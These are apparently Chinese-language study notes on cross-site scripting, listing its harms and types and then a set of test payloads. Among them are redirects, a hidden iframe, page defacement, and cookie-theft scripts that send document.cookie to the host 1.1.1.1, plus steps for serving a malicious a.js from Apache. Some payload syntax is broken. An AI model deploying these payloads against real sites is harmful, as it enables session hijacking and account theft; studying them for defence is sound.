xss(挖掘闭合,绕过)-----跨站脚本-----缓冲区溢出攻击
cookie
后台地址发送给你
通过服务器的漏洞攻击客户端
xss危害:
钓鱼,窃取cookie
强制弹出广告页面,刷流量,
网页挂马,提升权限,
传播跨站脚本蠕虫
调用js代码:
标签,属性,元素,样式
alert(1); #输出语句
xss分类:
反射型(非持久)
DOM型
存储型(持久型)
反射型XSS—最常见的,主要用于将恶意的脚本附加到URL地址参数当中-------搜索栏
存储型XSS—存在数据库中,只要访问就会受到攻击----留言板
进行检测:
传个参数?x=asdaas
click
漏洞验证
<body onload=alert('xss')>
<img src='javascript:alert('xss')'> 插入图片
<a href='' onclick=alert('xss')">type</a>
<img src="http://1.1.1.1/a.jpg" onerror=alert('xss')>
<script>window.location="http://www.xxx.com"</script> 进行重定向到一个新的网站 (重定向到百度)
<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>
<script>new imag().src="http://1.1.1.1/c.php?output="+document.cookie;</script> 显示cookie
<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>
窃取cookie
a.js源码
cd /var/www/html
vim a.js
service apache2 start
var img = new image();
img.src="http://1.1.1.1/cookie.php?cookie="+document.cookie;
工具beef(相当好用的那种)